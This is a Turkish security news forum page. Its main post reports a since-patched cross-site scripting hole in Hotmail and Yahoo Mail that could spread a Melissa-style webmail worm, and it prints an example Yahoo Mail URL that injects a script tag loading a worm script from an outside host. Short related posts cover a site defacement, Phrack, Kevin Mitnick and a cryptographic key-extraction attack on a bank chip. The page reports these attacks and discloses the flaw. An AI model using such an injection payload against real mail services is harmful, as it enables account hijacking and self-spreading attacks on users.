Hotmail ve Yahoomail virus tehdidi altında

0
conan
Web tabanlı email servislerinde yeni saptanan bir açık Melissa tipi virüslerin yayılmasına neden olabiliyor.
Açık kısaca şöyle tanımlanıyor. Kötü niyetli kullanıcı emailinin içerisinde web tabanlı servisin serverının bir linkini yerleştiriyor. Bu linkin ucunda ise kişinin inbox'ını gezebilecek ve de bu inbox'da gördüğü her email'e kötü niyetli bir kod yollayabilecek bir Javascript var.
Yahoomail için link örneği: http://us.f117.mail.yahoo.com/ym/ShowFolder?ET=1&YY=12345&inc=10&order=asd%22%3E%3Cscript%20language%3D%22Javascript%22%20src%3D%22http%3A//www.sidesport.com/webworm/webmailworm.js%22%3E%3C/script%3E%3C%22asd

Gelelim işin asıl önemli boyutuna. Email içinde verilen link ile web tabanlı email servisinin serverının adresi aynı olduğundan (domain bazında) bu link hiçbir güvenlik yorumundan geçmeden kullanıcıya sunuluyor. (no domain bounding error) 2 haziran itibari ile her iki büyük web mail servisi de bu sorunu yamamış gibi gözüküyor.

Ayrıntılı bilgi:
- SideSport: Sorunu bulan kişinin sitesi
- SecurityFocusda bu konudaki haber

İlgili Yazılar

Türkçe Güvenlik Wikisi

charissma

Türkiye'de ilk defa bir güvenlik wikisi açıldı, Doctus Wiki. Aslında açılalı 3-4 ay oldu ama şu sıralar hızlı bir ilerleme kaydediyor. Bilgi olarak; bu Türkçe olarak yayına geçen ilk güvenlik wikisi ve ev kullanıcılarına hitap ediyor. Dünyaya baktığımızda ise sadece bir tane daha var, Castlecops wiki.

%100 güvenlik mümkün değil

daegil

Önemli güvenlik organizasyonlarından Information Systems Security Association'ın İngiltere şubesi, web sunucularının saldırıya uğradığını ve ana sayfanın değiştirildiğini belirtti. Yetkililere göre 2004 Aralık tarihinde ana sunucu başka bir makinaya taşındıktan ve güncellendikten sonra, bazı yamaların yüklenmesinin unutulması yüzünden böyle bir şey mümkün olabildi.

7 Ocak 2005 - 19:39 tarihinde gerçekleşen olaya dair bir web sitesinden alınan bilgiye göre eylemin sorumlusu "iskorpitx" takma isimli kötü niyetli bir bilgisayarcı. Aynı haber sitesinde yer alan ve vakayı gösteren görüntüde büyük Türk bayrakları vardı ve "HACKED By iSKORPiTX (Turkish Hacker)" yazıyordu, ardından tarayıcı kullanıcıyı yunus resimleri ile dolu bir siteye yönlendiriyordu.

Kaynak: http://news.zdnet.co.uk/0,39020330,39185308,00.htm

Phrack #63

sakpolat

Merakla beklenen Phrack dergisinin 63. sayısı yayınlandı.
http://www.phrack.org

Kevin Mitnick: Soru / Cevap

anonim

Internet'e geri dönen Kevin Mitnick, slashdot.org'da sorulan soruları cevaplıyor. Yazıda ilginç soru ve cevaplar yer alıyor.. http://slashdot.org/article.pl?sid=03/02/04/2233250

ATM şifreleme anahtarı kırmak!

conan

Bu sayfada yazanlara göre IBM 4758 cryptographic co-processor'unden 3DES anahtarını "çalmayı" başarmışlar.

IBM 4758, bankalar tarafından sıklıkla kullanılan bir şifreleme chipiymiş ve IBM'in ATM'lerinde de sıkça kullanılmaktaymış. Bu crack'i gerçekleştirenler, 20 dakika makinaya kesintisiz ulaşımı ve Combine_Key_Parts kullanım yetkisi olan birinin, 995$'lik bir aletle (FPGA evaluation board from Altera) 2 gün içerisinde bu şifreyi ele geçirebilecegini iddia ediyorlar. (nasıl yapılacağını da bilmesi gerektiğini söylemeyi unuttum sanırım) ;)